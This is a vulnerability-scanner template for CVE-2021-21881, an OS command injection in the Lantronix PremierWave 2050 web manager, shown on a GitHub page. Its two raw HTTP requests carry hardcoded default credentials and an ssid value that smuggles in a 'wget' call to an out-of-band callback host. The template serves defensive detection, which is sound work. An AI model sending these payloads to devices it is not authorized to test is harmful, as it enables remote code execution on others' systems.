-
Notifications
You must be signed in to change notification settings - Fork 220
/
Copy pathCVE-2021-21881.yaml
40 lines (34 loc) · 1.42 KB
/
CVE-2021-21881.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
id: CVE-2021-21881
info:
name: Lantronix PremierWave 2050 - Remote Code Execution
author: gy741
severity: critical
description: An OS command injection vulnerability exists in the Web Manager Wireless Network Scanner functionality of Lantronix PremierWave 2050 8.9.0.0R4. A specially-crafted HTTP request can lead to command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.
reference:
- https://talosintelligence.com/vulnerability_reports/TALOS-2021-1325
- https://nvd.nist.gov/vuln/detail/CVE-2021-21881
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.90
cve-id: CVE-2021-21881
cwe-id: CWE-78
tags: cve,cve2021,lantronix,rce,oast,cisco
requests:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Authorization: Basic dXNlcjp1c2Vy
Content-Type: application/x-www-form-urlencoded
ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid="'; wget http://{{interactsh-url}} #
- |
POST / HTTP/1.1
Host: {{Hostname}}
Authorization: Basic YWRtaW46UEFTUw==
Content-Type: application/x-www-form-urlencoded
ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid="'; wget http://{{interactsh-url}} #
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"